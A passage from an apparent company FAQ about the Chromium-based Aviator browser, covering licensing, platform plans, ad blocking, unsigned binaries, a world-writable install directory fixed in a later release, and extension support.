Chromium, from which Aviator is derived, contains a wide variety of OSS licenses, as can be seen using aviator://credits/ in Aviator or chrome://credits/ in Google Chrome. The portions of the code we modified in Aviator are all under BSD, or BSD-like, licenses. As such, publishing our changes is, strictly speaking, not a licensing requirement. This is not to say we won’t in the future, just that we’re discussing it internally first. Doing so is a big decision that shouldn’t be taken lightly. Of course, if and when we make a change to GPL or similarly licensed software in Chromium, we’ll happily publish the updates as required.

When is Aviator going to be available for Windows, Linux, iOS, Android, etc.?

Aviator was originally an internal project designed for WhiteHat Security employees. This served as a great environment to test our theories about how a truly secure and privacy-protecting browser should work. Since WhiteHat is primarily a Mac shop, we built it for OS X. Those outside of WhiteHat wanted to use the same browser that we did, so this week we made Aviator publicly available.

We are still in the very early days of making Aviator available to the public. The feedback so far has been very positive, and requests for Windows, Linux, and even open source versions are pouring in, so we are definitely determining where to focus our resources next, but there is no definite timeframe yet for when other versions will be available.

How long has WhiteHat been working on Aviator?

Browser security has been a subject of personal and professional interest for both me and Robert “RSnake” Hansen (Director, Product Management) for years. Both of us have discussed browser security risks around the world. A big part of Aviator research was spent creating something to protect WhiteHat employees and the data they are responsible for. Outside of WhiteHat, many people ask us what browser we use. Individually our answer has been, “mine.” Now we can be more specific: that browser is Aviator. A browser we feel confident using not only for our own security and privacy, but one we may confidently recommend to family and friends when asked.

Browsers have pop up blockers to deal with ads. What is different about Aviator’s approach?

Popup blockers used to work wonders, but advertisers switched to sourcing in JavaScript and actually putting content on the page. They no longer have to physically create a new window, because they can take over the entire page. With Aviator, the user’s browser doesn’t even make a connection to an advertising network’s servers, so obnoxious or potentially dangerous ads simply don’t load.

Why isn’t the Aviator application binary signed?

During the initial phases of development we considered releasing Aviator as a beta through the Mac App Store. Browsers attempt to take advantage of the fastest rendering paths they can. Some of the APIs involved are undocumented and are called “private APIs.” Apple does not support these APIs because they may change, and Apple doesn’t want to be held accountable when things break. As a result, while Apple allows people to use these undocumented and very fast private APIs, it doesn’t allow people to distribute applications that use them. We can speculate that the reason is that users are likely to think it’s Apple’s fault, as opposed to the program’s, when things break. So after about a month of wrestling with it, we decided that for now we’d avoid the Mac App Store. In the shuffle we didn’t continue signing the binaries as we had been. It was simply an oversight.

Why is Aviator’s application directory world-writable?

During the development process all of our developers were on dedicated computers, not shared computers. So this was an oversight brought on by the fact that there was no need to hide data from one another and therefore chmod permissions were too lax as source files were being copied and edited. This wouldn’t have been an issue if the permissions had been changed back to their less permissive state, but it was missed. We will get it fixed in an upcoming release.

Update: November 8, 2013:
Our dev team analyzed the overly-permissive chmod settings that Aviator 1.1 shipped with. We agreed it was overly permissive and have fixed the issue to be more in line with existing browsers to protect users on multi-user systems. Click to read more on our Aviator Browser 1.2 Beta release.

Does Aviator support Chrome extensions?

Yes, all Chrome extensions should function under Aviator. If an issue comes up, please report it to aviator@whitehatsec.com so we can investigate.

Wait a minute, first you say, “if you aren’t paying you are the product,” then you offer a free browser?

Fair point. Like we’ve said, Aviator started off as an internal project simply to protect WhiteHat employees and is not an official company “product.” Those outside the company asked if they could use the same browser that we do. Aviator is our answer to that. Since we’re not in the advertising and tracking business, how could we say no? At some point in the future we’ll figure out a way to generate revenue from Aviator, but in the meantime, we’re mostly interested in offering a browser that security- and privacy-conscious people want to use.

Have you gotten any feedback from the major browser vendors about Aviator? If so, what has it been?

We have not received any official feedback from any of the major browser vendors, though there has been some informal feedback from various employees of those vendors over Twitter. Some has been positive, some negative. In either case, we’re most interested in serving the everyday consumer.

Keep the questions and feedback coming and we will continue to endeavor to improve Aviator in ways that will be beneficial to the security community and to the average consumer.